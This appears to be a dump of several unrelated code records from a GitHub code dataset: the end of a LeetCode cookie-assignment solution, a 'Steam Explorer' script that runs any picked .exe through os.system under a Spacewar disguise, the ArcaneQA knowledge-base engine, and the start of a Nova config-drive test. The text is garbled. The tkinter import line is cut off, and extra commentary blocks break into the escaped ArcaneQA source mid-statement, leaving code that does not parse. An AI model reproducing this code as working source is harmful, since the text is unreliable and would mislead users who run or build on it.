s.pop()\n                result += 1\n        return result","repo_name":"junhong625/MOCOCO","sub_path":"[15주차] 그리디 알고리즘/[LeetCode 455번] Assign Cookies/홍영민_sort_for.py","file_name":"홍영민_sort_for.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"37943677799","text":"import os\nfrom tkinter import *\nfrom tkinter import 
\nprint(\"\"\"\n\n█▀ ▀█▀ █▀▀ ▄▀█ █▀▄▀█   █▀▀ ▀▄▀ █▀█ █░░ █▀█ █▀█ █▀▀ █▀█\n▄█ ░█░ ██▄ █▀█ █░▀░█   ██▄ █░█ █▀▀ █▄▄ █▄█ █▀▄ ██▄ █▀▄\n\"\"\")\nprint(\"Steam Explorer by MrModer#1144\")\nprint(\"Use it in Spacewar under the name SteamworksExample.exe\")\nprint(\"Close this window to exit ;)\")\ndef browseFiles():\n    filename = filedialog.askopenfilename(initialdir = \"/\",\n                                          title = \"Steam Explorer\",\n                                          filetypes = ((\"EXE files\",\n                                                        \"*.exe*\"),\n                                                       (\"all files\",\n                                                        \"*.*\")))\n    \n    os.system(f'\"{filename}\"')\n\nwhile True:\n    browseFiles()\n","repo_name":"MrM0der/steamexplorer","sub_path":"steamexplorer.py","file_name":"steamexplorer.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"ru","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"}
{"seq_id":"34893736908","text":"import random\nimport re\nimport time\nimport functools\nimport json\nfrom pathlib import Path\nfrom collections import defaultdict\nfrom typing import List, Dict\n\nfrom allennlp.common.util import START_SYMBOL, END_SYMBOL\nfrom allennlp.semparse import util\nfrom utils.sparql_cache import SparqlCache\n\n\npath = str(Path(__file__).parent.absolute())\n\n\ndef timer(func):\n    @functools.wraps(func)\n    def wrapper_timer(*args, **kwargs):\n        tic = time.perf_counter()\n        value = func(*args, **kwargs)\n        toc = time.perf_counter()\n        elapsed_time = toc - tic\n        print(f\"Elapsed time: {elapsed_time:0.4f} seconds for {func.__name__}\")\n        return value\n    return wrapper_timer\n\n\ndef get_vocab(dataset: str):\n    if dataset == \"grail\":\n        with open(path + '/../../vocabulary/grailqa.json') as f:\n            data = json.load(f)\n        return set(data[\"relations\"]), set(data[\"classes\"]), set(data[\"attributes\"])\n    elif dataset == \"graphq\":\n        with open(path + '/../../vocabulary/gq1.json') as f:\n            data = json.load(f)\n        return set(data[\"relations\"]), set(data[\"classes\"]), set(data[\"attributes\"])\n    elif dataset == \"webq\":\n        # with open(path + '/vocab_files/webq.json') as f:\n        with open(path + '/../../vocabulary/webq_full.json') as f:\n            data = json.load(f)\n        return set(data[\"relations\"]), set(data[\"classes\"]), set(data[\"attributes\"]), set(data[\"tc_attributes\"]), set(\n            data[\"cons_attributes\"]), data[\"cons_ids\"]\n    elif dataset == \"cwq\":\n        pass\n\n\ndef get_ontology(dataset: str):\n    class_hierarchy = defaultdict(lambda: [])\n    class_out_edges = defaultdict(lambda: set())\n    class_in_edges = defaultdict(lambda: set())\n    relation_domain = {}\n    relation_range = {}\n    date_attributes = set()\n    numerical_attributes = set()\n    if dataset == \"grail\":\n        fb_type_file = path + \"/../../ontology/commons/fb_types\"\n        fb_roles_file = path + \"/../../ontology/commons/fb_roles\"\n    elif dataset == \"graphq\":\n        fb_type_file = path + \"/../../ontology/fb_types\"\n        fb_roles_file = path + \"/../../ontology/fb_roles\"\n\n    else:  # webq does not need this information\n        return class_out_edges, class_in_edges, relation_domain, relation_range, date_attributes, numerical_attributes\n\n    with open(fb_type_file) as f:\n        for line in f:\n            fields = line.split()\n            if fields[2] != \"common.topic\":\n                class_hierarchy[fields[0]].append(fields[2])\n\n    with open(fb_roles_file) as f:\n        for line in f:\n            fields = line.split()\n            relation_domain[fields[1]] = fields[0]\n            relation_range[fields[1]] = fields[2]\n\n            class_out_edges[fields[0]].add(fields[1])\n            class_in_edges[fields[2]].add(fields[1])\n\n            if fields[2] in ['type.int', 'type.float']:\n                numerical_attributes.add(fields[1])\n            elif fields[2] == 'type.datetime':\n
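# Note on the fb_roles parsing above: each line is a whitespace-delimited
# (domain, relation, range) triple that gets indexed into per-class edge
# sets. The snippet below is a self-contained illustration of the same
# indexing idea on a made-up in-memory row; it is not part of this module.
#     rows = [("people.person", "people.person.nationality", "location.country")]
#     out_edges, in_edges = defaultdict(set), defaultdict(set)
#     for domain, relation, range_ in rows:
#         out_edges[domain].add(relation)  # relations leaving the domain class
#         in_edges[range_].add(relation)   # relations arriving at the range class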
date_attributes.add(fields[1])\n\n for c in class_hierarchy:\n for c_p in class_hierarchy[c]:\n class_out_edges[c].update(class_out_edges[c_p])\n class_in_edges[c].update(class_in_edges[c_p])\n\n return class_out_edges, class_in_edges, relation_domain, relation_range, date_attributes, numerical_attributes\n\n\nclass KBEngine:\n def __init__(self, dataset='grail', MAX_VARIABLES_NUM=20):\n self._dataset = dataset\n if dataset in [\"graphq\", \"grail\"]:\n self._relations, self._classes, self._attributes = get_vocab(dataset)\n elif dataset == \"webq\":\n self._relations, self._classes, self._attributes, self._tc_attributes, self._cons_attributes, self._cons_ids = get_vocab(\n dataset)\n\n if dataset == \"grail\":\n with open(path + '/../../ontology/domain_dict', 'r') as f:\n self._domain_dict = json.load(f)\n with open(path + '/../../ontology/domain_info', 'r') as f:\n self._domain_info = json.load(f)\n self._class_out, self._class_in, self._relation_d, self._relation_r, self._date_attributes, \\\n self._numerical_attributes = get_ontology(dataset)\n self._date_attributes = self._date_attributes.intersection(self._attributes)\n self._numerical_attributes = self._numerical_attributes.intersection(self._attributes)\n self._cache = SparqlCache(dataset)\n self.training = False\n self.max_variables_num = MAX_VARIABLES_NUM\n\n def get_vocab(self):\n return self._relations, self._classes, self._attributes\n\n def set_training(self, training): # call it at the beginning of each forward pass\n self.training = training\n\n def process_value(self, value):\n data_type = value.split(\"^^\")[1].split(\"#\")[1]\n if data_type not in ['integer', 'float', 'double', 'dateTime']:\n value = f'\"{value.split(\"^^\")[0] + \"-08:00\"}\"^^<{value.split(\"^^\")[1]}>'\n # value = value.split(\"^^\")[0] + '-08:00^^' + value.split(\"^^\")[1]\n else:\n value = f'\"{value.split(\"^^\")[0]}\"^^<{value.split(\"^^\")[1]}>'\n\n return value\n\n def get_relations_for_variables(self, entities, reverse=False, add_noise=False):\n '''\n The most straightforward way is obviously get those relations using SPARQL query, but I am not sure about\n the efficiency of doing this.\n Also, for debug purpose, we can also just simply return all the relations in Freebase to make sure the whole\n flow works.\n :param entities: A set of entities\n :param reverse: True indicates outgoing relations, while False indicates ingoing relations\n :return: All adjacent relations of those entities\n '''\n\n # if TC:\n # tc_relations = set()\n # for r in self._relations:\n # if r.__contains__(\".from\"):\n # tc_relations.add(r)\n # return tc_relations\n\n # print(\"get relations for: {} entities\".format(len(entities)))\n rtn = set()\n # TODO: remove this constraint, this is only for debugging.\n for entity in list(entities)[:20]:\n try:\n if reverse:\n rtn.update(self._cache.get_out_relations(entity).intersection(self._relations))\n else:\n rtn.update(self._cache.get_in_relations(entity).intersection(self._relations))\n except Exception:\n # print(\"entity:\", entity)\n pass\n # print(entities)\n # print(\"done getting relations\")\n\n if self.training and add_noise:\n if not self._dataset == 'grail':\n rtn.update(random.sample(self._relations, 100))\n elif len(self._domains) > 0:\n if random.random() > 0.5:\n vocab = set()\n for d in self._domains:\n vocab.update(self._domain_dict[d])\n # rtn = rtn.intersection(vocab)\n if len(vocab) > 100:\n rtn.update(random.sample(vocab, 100))\n else:\n rtn.update(vocab)\n\n return rtn\n\n def 
get_relations_for_class(self, class_name, reverse=False, add_noise=False):\n if reverse:\n return self._class_out[class_name].intersection(self._relations)\n else:\n return self._class_in[class_name].intersection(self._relations)\n\n def get_attributes_for_variables(self, entities, add_noise=False):\n rtn = set()\n # TODO: remove this constraint, this is only for debugging.\n for entity in list(entities)[:20]:\n try:\n rtn.update(self._cache.get_out_relations(entity).intersection(self._attributes))\n except Exception:\n # print(\"entity:\", entity)\n pass\n # print(entities)\n # print(\"done getting relations\")\n\n if self.training and add_noise:\n if len(self._attributes) > 100:\n rtn.update(random.sample(self._attributes, 100))\n else:\n rtn.update(self._attributes)\n\n return rtn\n\n def get_tc_attributes_for_variables(self, entities, add_noise=False):\n rtn = set()\n # TODO: remove this constraint, this is only for debugging.\n for entity in list(entities)[:20]:\n try:\n rtn.update(self._cache.get_out_relations(entity).intersection(self._tc_attributes))\n except Exception:\n # print(\"entity:\", entity)\n pass\n\n if self.training and add_noise:\n if len(self._tc_attributes) > 100:\n rtn.update(random.sample(self._tc_attributes, 100))\n else:\n rtn.update(self._tc_attributes)\n\n return rtn\n\n def get_cons_attributes_for_variables(self, entities, add_noise=False):\n rtn = set()\n # TODO: remove this constraint, this is only for debugging.\n for entity in list(entities)[:20]:\n try:\n rtn.update(self._cache.get_out_relations(entity).intersection(self._cons_attributes))\n except Exception:\n # print(\"entity:\", entity)\n pass\n\n if self.training and add_noise:\n if len(self._cons_attributes) > 100:\n rtn.update(random.sample(self._cons_attributes, 100))\n else:\n rtn.update(self._cons_attributes)\n\n return rtn\n\n def get_attributes_for_value(self, value, add_noise=False, use_ontology=True):\n rtn = set()\n\n if use_ontology:\n if value.__contains__(\"#float\") or value.__contains__(\"#integer\") or value.__contains__(\"#double\"):\n rtn.update(self._numerical_attributes)\n else:\n rtn.update(self._date_attributes)\n else: # retrieve based on KB facts\n data_type = value.split(\"#\")[1]\n if data_type not in ['integer', 'float', 'double', 'dateTime']:\n value = f'\"{value.split(\"^^\")[0] + \"-08:00\"}\"^^<{value.split(\"^^\")[1]}>'\n else:\n value = f'\"{value.split(\"^^\")[0]}\"^^<{value.split(\"^^\")[1]}>'\n\n rtn.update(self._cache.get_in_attributes(value).intersection(self._attributes))\n\n if self.training and add_noise:\n if len(self._attributes) > 100:\n rtn.update(random.sample(self._attributes, 100))\n else:\n rtn.update(self._attributes)\n\n return rtn\n\n def get_attributes_for_class(self, class_name, add_noise=False):\n return self._class_out[class_name].intersection(self._attributes)\n\n def is_intersectant(self, derivation1, derivation2):\n return self._cache.is_intersectant(derivation1, derivation2)\n\n def get_reachable_classes(self, derivations, answer_types):\n reachable_classes = set()\n for a in answer_types:\n flag = True\n for d in derivations:\n if not self._cache.is_reachable(d, a):\n flag = False\n break\n if flag:\n reachable_classes.add(a)\n\n return reachable_classes\n\n def get_classes_for_variables(self, entities, add_noise=False):\n # print(\"get classes for: {} entities\".format(len(entities)))\n rtn = set()\n # TODO: remove this constraint, this is only for debugging.\n for entity in list(entities)[:20]:\n 
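            # These accessors all funnel through SparqlCache lookups, which is
            # the hot path. If the cache object did not already deduplicate
            # queries, a functools.lru_cache wrapper would be one lightweight
            # option. A hedged sketch; the fetch function named here is a
            # stand-in, not part of ArcaneQA's real API:
            #     @functools.lru_cache(maxsize=100_000)
            #     def cached_types(entity: str) -> frozenset:
            #         # frozenset keeps the result hashable and shareable
            #         return frozenset(sparql_fetch_types(entity))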
rtn.update(set(self._cache.get_types(entity)).intersection(self._classes))\n\n if self.training and add_noise:\n if not self._dataset == \"grail\":\n if len(self._classes) > 100:\n rtn.update(random.sample(self._classes, 100))\n else:\n rtn.update(self._classes)\n elif len(self._domains) > 0:\n if random.random() > 0.5:\n vocab = set()\n for d in self._domains:\n vocab.update(self._domain_dict[d])\n # rtn = rtn.intersection(vocab)\n if len(vocab) > 100:\n rtn.update(random.sample(vocab, 100))\n else:\n rtn.update(vocab)\n\n return rtn\n\n # return classes\n\n def get_constraints_for_variables(self, entities, cons_attribute):\n rtn = set()\n # TODO: remove this constraint, this is only for debugging.\n for entity in list(entities)[:20]:\n rtn.update(set(self._cache.get_out_entities(entity, cons_attribute)).intersection(self._cons_ids))\n\n return rtn\n\n def execute_AND(self, arg1, arg2):\n if not isinstance(arg2, set):\n rtn = set()\n # TODO: this is only for debug\n for entity in list(arg1)[:20]:\n if arg2 in self._cache.get_types(entity):\n rtn.add(entity)\n return rtn\n else:\n return arg1.intersection(arg2)\n\n def execute_JOIN(self, arg1, arg2):\n # print(\"execute JOIN for: {} entities\".format(len(arg1)))\n rtn = set()\n if isinstance(arg1, str):\n value = arg1\n data_type = value.split(\"^^\")[1].split(\"#\")[1]\n if data_type not in ['integer', 'float', 'double', 'dateTime']:\n value = f'\"{value.split(\"^^\")[0] + \"-08:00\"}\"^^<{value.split(\"^^\")[1]}>'\n # value = value.split(\"^^\")[0] + '-08:00^^' + value.split(\"^^\")[1]\n else:\n value = f'\"{value.split(\"^^\")[0]}\"^^<{value.split(\"^^\")[1]}>'\n\n rtn.update(self._cache.get_in_entities_for_literal(value, arg2))\n else:\n if arg2[-4:] == '_inv':\n # TODO: this is only for debug\n for entity in list(arg1)[:20]:\n # print(entity, arg2[1])\n rtn.update(self._cache.get_out_entities(entity, arg2[:-4]))\n else:\n # TODO: this is only for debug\n for entity in list(arg1)[:20]:\n # print(arg2, entity)\n rtn.update(self._cache.get_in_entities(entity, arg2))\n # print(\"done executing JOIN\")\n return rtn\n\n def execute_TC(self, arg1, arg2, arg3):\n # TODO: apply time constraint (not urgent)\n return arg1\n\n def execute_Comparative(self, arg1, arg2, comparator):\n assert isinstance(arg1, str) # it must be a value instead of a set of entities\n value = arg1\n if comparator == 'le':\n comp = '<='\n elif comparator == 'lt':\n comp = '<'\n elif comparator == 'ge':\n comp = '>='\n elif comparator == 'gt':\n comp = '>'\n\n data_type = value.split(\"^^\")[1].split(\"#\")[1]\n if data_type not in ['integer', 'float', 'double', 'dateTime']:\n value = f'\"{value.split(\"^^\")[0] + \"-08:00\"}\"^^<{value.split(\"^^\")[1]}>'\n # value = value.split(\"^^\")[0] + '-08:00^^' + value.split(\"^^\")[1]\n else:\n value = f'\"{value.split(\"^^\")[0]}\"^^<{value.split(\"^^\")[1]}>'\n\n rtn = set()\n rtn.update(self._cache.get_entities_cmp(value, arg2, comp))\n\n return rtn\n\n # @timer\n def get_admissible_actions(self, predictions, variables, num_topics, arg_mode=False, arg_variables=set(),\n arg_class=None,\n add_noise=False,\n domains=None,\n answer_types=None,\n derivations=None,\n initial_map=None):\n \"\"\"\n This helps to get the admissible actions of a decoding step given predictions from previous 2 steps\n :param predictions:\n :param variables:\n :param num_topics: number of topic entities (values)\n :param arg_mode: indicate now it's inside a superlative function\n :return:\n \"\"\"\n\n if domains is not None and len(domains) > 0:\n 
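            # Side note on execute_Comparative above: the comparator
            # token-to-symbol chain can be collapsed into a lookup table, e.g.
            #     _COMPARATOR_TO_SPARQL = {"le": "<=", "lt": "<", "ge": ">=", "gt": ">"}
            #     comp = _COMPARATOR_TO_SPARQL[comparator]  # KeyError on unknown tokens
            # (illustrative only; the original keeps the explicit if/elif chain)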
assert self._dataset == 'grail'\n self._domains = domains\n else:\n self._domains = []\n\n admissible_constants = []\n admissible_variables = []\n # computing a score for all vocab items is intractable, so we use a small set of items to represent the\n # entire vocab\n representative_vocab_items = []\n\n if len(predictions) == 1:\n two_tokens = [None, predictions[0]]\n else:\n two_tokens = predictions[-2:]\n\n token = two_tokens[1]\n if token == START_SYMBOL:\n admissible_constants.append('(')\n elif token in [END_SYMBOL, \"@@UNKNOWN@@\", \"@@PADDING@@\"]:\n admissible_constants.append(END_SYMBOL)\n elif token == '(':\n if two_tokens[0][0] != '#' and two_tokens[0] not in self._classes:\n if two_tokens[0] != START_SYMBOL:\n if self._dataset in ['graphq', 'grail']:\n admissible_constants.extend(\n ['AND', 'JOIN', 'ARGMAX', 'ARGMIN', 'COUNT', 'lt', 'le', 'gt', 'ge'])\n elif self._dataset == \"webq\":\n admissible_constants.extend(['AND', 'JOIN', 'TC', 'CONS', 'ARGMAX', 'ARGMIN'])\n elif self._dataset == \"cwq\":\n admissible_constants.extend(['AND', 'JOIN', 'TC', 'CONS', 'ARGMAX', 'ARGMIN', 'lt', 'gt'])\n\n else: # The first function\n if self._dataset in ['graphq', 'grail']:\n if len(variables) == 0:\n admissible_constants.extend(['ARGMAX', 'ARGMIN'])\n # for grailqa, it could be (ARGMAX class relation)\n else:\n admissible_constants.extend(\n ['JOIN', 'lt', 'le', 'gt', 'ge', 'ARGMAX', 'ARGMIN'])\n elif self._dataset == \"webq\":\n admissible_constants.extend(['JOIN'])\n elif self._dataset == \"cwq\":\n admissible_constants.extend(['JOIN', 'lt', 'gt'])\n\n elif token == ')':\n if predictions[-3] == 'COUNT':\n admissible_constants.append(END_SYMBOL) # COUNT function is never nested\n elif arg_mode and two_tokens[0] in self._attributes:\n admissible_constants.append(END_SYMBOL) # ARG function is never nested\n else:\n if len(variables) < self.max_variables_num:\n admissible_constants.extend([END_SYMBOL, '('])\n else:\n admissible_constants.append(END_SYMBOL) # force to stop\n elif token in ['AND', 'COUNT', 'TC', 'CONS']:\n for i in range(len(variables)):\n if isinstance(variables[i], set):\n if i >= num_topics: # can only be applied to intermediate executions\n admissible_variables.append(i)\n elif token == 'JOIN':\n if self._dataset in [\"graphq\", \"grail\"]:\n for i in range(len(variables)): # JOIN accepts both entities and literals\n admissible_variables.append(i)\n elif self._dataset == \"webq\":\n for i in range(len(variables)):\n if isinstance(variables[i], str) and not re.match(\"[\\d]{4}\", variables[i]):\n admissible_variables.append(i)\n elif isinstance(variables[i], set):\n admissible_variables.append(i)\n\n elif token in ['ARGMAX', 'ARGMIN']:\n for i in range(len(variables)):\n if isinstance(variables[i], set):\n if i >= num_topics:\n admissible_variables.append(i)\n if len(admissible_variables) == 0 and self._dataset == \"grail\":\n if self.training:\n admissible_constants.extend(self._classes)\n else:\n admissible_constants.extend(answer_types)\n elif len(admissible_variables) == 0 and self._dataset == \"graphq\":\n for c in self._classes:\n if c[:7] != 'common.' and c[:5] != 'type.' and c[:3] != 'kg.' and c[:5] != 'user.' 
\\\n and c[:5] != 'base.':\n admissible_constants.append(c)\n # else the first argument should not be a class\n elif token in ['le', 'lt', 'ge', 'gt']:\n for i in range(len(variables)):\n if isinstance(variables[i], str):\n admissible_variables.append(i)\n elif token == 'NOW':\n admissible_constants.append(')')\n elif token[0] == '#':\n if two_tokens[0] == 'AND':\n if self._dataset in ['graphq', 'grail']:\n if self.training or self._dataset == 'graphq':\n admissible_constants.extend(\n self.get_classes_for_variables(variables[int(token[1:])], add_noise=add_noise))\n\n # admissible_constants.extend(\n # self.get_classes_for_variables(variables[int(token[1:])], add_noise=add_noise).intersection(\n # set(answer_types)))\n else:\n try:\n derivations_list = []\n for k in derivations[int(token[1:])]:\n if len(derivations[int(token[1:])][k]) == 0: # no derivation info\n continue\n start = variables[k]\n if isinstance(start, set):\n derivations_list.append(\n [':' + list(start)[0], derivations[int(token[1:])][k][0]])\n else:\n value = self.process_value(start)\n if len(derivations[int(token[1:])][k]) == 2:\n derivations_list.append([value, derivations[int(token[1:])][k][0],\n derivations[int(token[1:])][k][1]])\n else:\n derivations_list.append([value, derivations[int(token[1:])][k][0]])\n\n admissible_constants.extend(\n self.get_reachable_classes(derivations_list, answer_types))\n\n except Exception:\n admissible_constants.extend(\n self.get_classes_for_variables(variables[int(token[1:])],\n add_noise=add_noise).intersection(set(answer_types)))\n\n elif self._dataset == 'webq':\n admissible_constants.extend(\n self.get_classes_for_variables(variables[int(token[1:])], add_noise=add_noise))\n\n admissible_v = []\n if isinstance(variables[int(token[1:])], set):\n for i in range(len(variables)):\n if i != int(token[1:]):\n if isinstance(variables[i], set):\n if i >= num_topics:\n # if len(variables[i].intersection(variables[int(token[1:])])) > 0:\n # currently only support path sub-queries intersection\n try:\n assert len(derivations[i]) == 1\n derivation_1 = []\n for k in derivations[i]:\n start = variables[k]\n if isinstance(start, set):\n derivation_1.append(':' + list(start)[0])\n else:\n value = self.process_value(start)\n derivation_1.append(value)\n derivation_1.append(derivations[i][k][0])\n if len(derivations[i][k]) == 2:\n derivation_1.append(derivations[i][k][1])\n assert len(derivations[int(token[1:])]) == 1\n derivation_2 = []\n for k in derivations[int(token[1:])]:\n start = variables[k]\n if isinstance(start, set):\n derivation_2.append(':' + list(start)[0])\n else:\n value = self.process_value(start)\n derivation_2.append(value)\n derivation_2.append(derivations[int(token[1:])][k][0])\n if len(derivations[int(token[1:])][k]) == 2:\n derivation_2.append(derivations[int(token[1:])][k][1])\n if self.is_intersectant(derivation_1, derivation_2):\n admissible_v.append(i)\n except Exception:\n if len(variables[i].intersection(variables[int(token[1:])])) > 0:\n admissible_v.append(i)\n admissible_variables.extend(admissible_v)\n elif two_tokens[0] in ['JOIN']:\n if isinstance(variables[int(token[1:])], str): # literal\n if self._dataset in [\"graphq\", \"grail\"]:\n admissible_constants.extend(\n self.get_attributes_for_value(variables[int(token[1:])], add_noise=add_noise,\n use_ontology=False)\n )\n elif self._dataset == \"webq\":\n admissible_constants.append(\"sports.sports_team_roster.number\")\n else:\n admissible_constants.extend(\n 
self.get_relations_for_variables(variables[int(token[1:])], add_noise=add_noise))\n admissible_constants.extend(map(lambda x: x + '_inv',\n self.get_relations_for_variables(variables[int(token[1:])],\n reverse=True,\n add_noise=add_noise)))\n elif two_tokens[0] in ['le', 'lt', 'ge', 'gt']:\n assert isinstance(variables[int(token[1:])], str)\n admissible_constants.extend(\n self.get_attributes_for_value(variables[int(token[1:])], add_noise=add_noise)\n )\n elif two_tokens[0] in ['ARGMAX', 'ARGMIN']:\n admissible_constants.extend(\n self.get_relations_for_variables(variables[int(token[1:])], reverse=True, add_noise=add_noise))\n admissible_constants.extend(map(lambda x: x + '_inv',\n self.get_relations_for_variables(variables[int(token[1:])],\n add_noise=add_noise)))\n admissible_constants.extend(\n self.get_attributes_for_variables(variables[int(token[1:])], add_noise=add_noise))\n elif two_tokens[0] == 'COUNT':\n admissible_constants.extend([')'])\n elif two_tokens[0] == 'TC':\n assert self._dataset in [\"webq\", \"cwq\"]\n admissible_constants.extend(\n self.get_tc_attributes_for_variables(variables[int(token[1:])], add_noise=add_noise))\n elif two_tokens[0] == \"CONS\":\n assert self._dataset in [\"webq\", \"cwq\"]\n admissible_constants.extend(\n self.get_cons_attributes_for_variables(variables[int(token[1:])], add_noise=add_noise))\n elif two_tokens[0][0] == '#': # (AND #1 #2)\n admissible_constants.extend([')'])\n else:\n if self._dataset in [\"graphq\", \"grail\"]:\n print(\"Unexpected:\", two_tokens[0])\n elif self._dataset == \"webq\":\n assert isinstance(variables[int(token[1:])], str)\n assert two_tokens[0] in self._tc_attributes\n admissible_constants.append(')')\n elif self._dataset in [\"graphq\", \"grail\"] and token in self._attributes:\n admissible_constants.append(')')\n elif self._dataset in [\"webq\", \"cwq\"] and token in self._tc_attributes and len(predictions) > 2 and predictions[\n -3] == 'TC':\n # Actually len(predictions) should always be at least 3 here, but at the early stage of beam search,\n # it's possible to include some illegal actions to fill the beam size\n for i in range(len(variables)):\n if isinstance(variables[i], str):\n if re.match(\"[\\d]{4}\", variables[i]): # year\n admissible_variables.append(i)\n if len(admissible_variables) == 0:\n admissible_constants.append('NOW')\n elif self._dataset in [\"webq\", \"cwq\"] and token in self._cons_attributes and len(predictions) > 2 and \\\n predictions[-3] == 'CONS':\n admissible_constants.extend(self.get_constraints_for_variables(variables[int(predictions[-2][1:])], token))\n # admissible_constants.extend(self._cons_ids)\n elif self._dataset in [\"webq\", \"cwq\"] and token in self._cons_ids:\n admissible_constants.append(')')\n elif token in self._relations and token in self._attributes:\n # for cwq and webq, it's possible to have overlap between attributes and relations\n admissible_constants.append(')')\n elif token in self._relations or token.replace(\"_inv\", '') in self._relations:\n if arg_mode:\n if arg_class is not None:\n admissible_constants.extend(self.get_attributes_for_class(arg_class, add_noise=add_noise))\n\n admissible_constants.extend(\n self.get_relations_for_class(arg_class, reverse=True, add_noise=add_noise))\n admissible_constants.extend(\n map(lambda x: x + '_inv',\n self.get_relations_for_class(arg_class, reverse=False, add_noise=add_noise))\n )\n else:\n admissible_constants.extend(\n self.get_attributes_for_variables(arg_variables, add_noise=add_noise))\n\n 
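                    # The '_inv' suffix used throughout this block marks a
                    # relation traversed in the reverse direction. A helper of
                    # the following shape (a sketch, not code from the original
                    # repository) makes the convention self-inverting:
                    #     def invert_relation(relation: str) -> str:
                    #         return relation[:-4] if relation.endswith("_inv") else relation + "_inv"
                    #     # invert_relation(invert_relation(r)) == r for any relation name r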
admissible_constants.extend(\n self.get_relations_for_variables(arg_variables, reverse=True, add_noise=add_noise))\n\n admissible_constants.extend(map(lambda x: x + '_inv',\n self.get_relations_for_variables(arg_variables,\n add_noise=add_noise)))\n else:\n admissible_constants.extend([')'])\n elif self._dataset in [\"webq\", 'cwq'] and token in self._attributes:\n admissible_constants.append(')')\n elif token in self._classes:\n # I made a change to datareader, now variable is forced to be precede class, so the following\n # doesn't make sense any more.\n # admissible_variables.extend([i for i in range(len(variables))])\n if two_tokens[0] not in ['ARGMAX', 'ARGMIN']:\n admissible_constants.extend([')'])\n else: # This is not gonna happen for webq or cwq\n assert self._dataset in [\"graphq\", \"grail\"]\n admissible_constants.extend(self.get_relations_for_class(token, reverse=True, add_noise=add_noise))\n admissible_constants.extend(self.get_attributes_for_class(token, add_noise=add_noise))\n\n if self.training:\n if len(admissible_constants) == 0 and len(admissible_variables) == 0:\n admissible_constants.append(END_SYMBOL) # In this way we can get infinite loss we want\n\n for p in predictions:\n if p[0] == \"#\":\n if int(p[1:]) in admissible_variables:\n admissible_variables.remove(int(p[1:])) # TODO: for webq, this may not be true\n if int(p[1:]) < num_topics: # remove variables of the same mention\n mention = initial_map[int(p[1:])][1]\n to_remove = []\n for v in admissible_variables:\n if v < num_topics and initial_map[v][1] == mention:\n to_remove.append(v)\n for v in to_remove:\n admissible_variables.remove(v)\n\n\n if len(admissible_variables) > 0:\n admissible_constants = []\n\n\n return admissible_constants, admissible_variables, representative_vocab_items","repo_name":"dki-lab/ArcaneQA","sub_path":"source/utils/kb_engine.py","file_name":"kb_engine.py","file_ext":"py","file_size_in_byte":33711,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"48"} +{"seq_id":"28563220097","text":"import datetime\n\nimport mock\nfrom oslo_config import cfg\nfrom oslo_serialization import jsonutils\nimport webob\n\nfrom nova.api.openstack.compute import extension_info\nfrom nova.api.openstack.compute.legacy_v2 import servers as servers_v2\nfrom nova.api.openstack.compute import servers as servers_v21\nfrom nova.api.openstack import extensions\nfrom nova.compute import api as compute_api\nfrom nova.compute import flavors\nfrom nova import exception\nfrom nova import objects\nfrom nova import test\nfrom nova.tests.unit.api.openstack import fakes\nfrom nova.tests.unit import fake_instance\nfrom nova.tests.unit.image import fake\nfrom nova.tests import uuidsentinel as uuids\n\nCONF = cfg.CONF\n\n\nclass ConfigDriveTestV21(test.TestCase):\n base_url = '/v2/fake/servers/'\n\n def _setup_wsgi(self):\n self.app = fakes.wsgi_app_v21(init_only=('servers', 'os-config-drive'))\n\n def setUp(self):\n super(ConfigDriveTestV21, self).setUp()\n fakes.stub_out_networking(self)\n fakes.stub_out_rate_limiting(self.stubs)\n fake.stub_out_image_service(self)\n self._setup_wsgi()\n\n def test_show(self):\n self.stub_out('nova.db.instance_get',\n fakes.fake_instance_get())\n self.stub_out('nova.db.instance_get_by_uuid',\n fakes.fake_instance_get())\n req = webob.Request.blank(self.base_url + uuids.sentinel)\n req.headers['Content-Type'] = 'application/json'\n response = req.get_response(self.app)\n self.assertEqual(response.status_int, 200)\n res_dict = 
jsonutils.loads(response.body)\n self.assertIn('config_drive', res_dict['server'])\n\n @mock.patch('nova.compute.api.API.get_all')\n def test_detail_servers(self, mock_get_all):\n # NOTE(danms): Orphan these fakes (no context) so that we\n # are sure that the API is requesting what it needs without\n # having to lazy-load.\n mock_get_all.return_value = objects.InstanceList(\n objects=[fakes.stub_instance_obj(ctxt=None, id=1),\n fakes.stub_instance_obj(ctxt=None, id=2)])\n req = fakes.HTTPRequest.blank(self.base_url + 'detail')\n res = req.get_response(self.app)\n server_dicts = jsonutils.loads(res.body)['servers']\n self.assertNotEqual(len(server_dicts), 0)\n for server_dict in server_dicts:\n self.assertIn('config_drive', server_dict)\n\n\nclass ConfigDriveTestV2(ConfigDriveTestV21):\n def _setup_wsgi(self):\n self.flags(\n osapi_compute_extension=[\n 'nova.api.openstack.compute.contrib.select_extensions'],\n osapi_compute_ext_list=['Config_drive'])\n self.app = fakes.wsgi_app(init_only=('servers',))\n\n\nclass ServersControllerCreateTestV21(test.TestCase):\n base_url = '/v2/fake/'\n bad_request = exception.ValidationError\n\n def _set_up_controller(self):\n ext_info = extension_info.LoadedExtensionInfo()\n self.controller = servers_v21.ServersController(\n extension_info=ext_info)\n CONF.set_override('extensions_blacklist',\n 'os-config-drive',\n 'osapi_v21')\n self.no_config_drive_controller = servers_v21.ServersController(\n extension_info=ext_info)\n\n def _verfiy_config_drive(self, **kwargs):\n self.assertNotIn('config_drive', kwargs)\n\n def _initialize_extension(self):\n pass\n\n def setUp(self):\n \"\"\"Shared implementation for tests below that create instance.\"\"\"\n super(ServersControllerCreateTestV21, self).setUp()\n\n self.instance_cache_num = 0\n self._set_up_controller()\n\n def instance_create(context, inst):\n inst_type = flavors.get_flavor_by_flavor_id(3)\n image_uuid = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'\n def_image_ref = 'http://localhost/images/%s' % image_uuid\n self.instance_cache_num += 1\n instance = fake_instance.fake_db_instance(**{\n 'id': self.instance_cache_num,\n 'display_name': inst['display_name'] or 'test',\n 'uuid': fakes.FAKE_UUID,\n 'instance_type': inst_type,\n 'access_ip_v4': '1.2.3.4',\n 'access_ip_v6': 'fead::1234',\n 'image_ref': inst.get('image_ref', def_image_ref),\n 'user_id': 'fake',\n 'project_id': 'fake',\n 'reservation_id': inst['reservation_id'],\n \"created_at\": datetime.datetime(2010, 10, 10, 12, 0, 0),\n \"updated_at\": datetime.datetime(2010, 11, 11, 11, 0, 0),\n 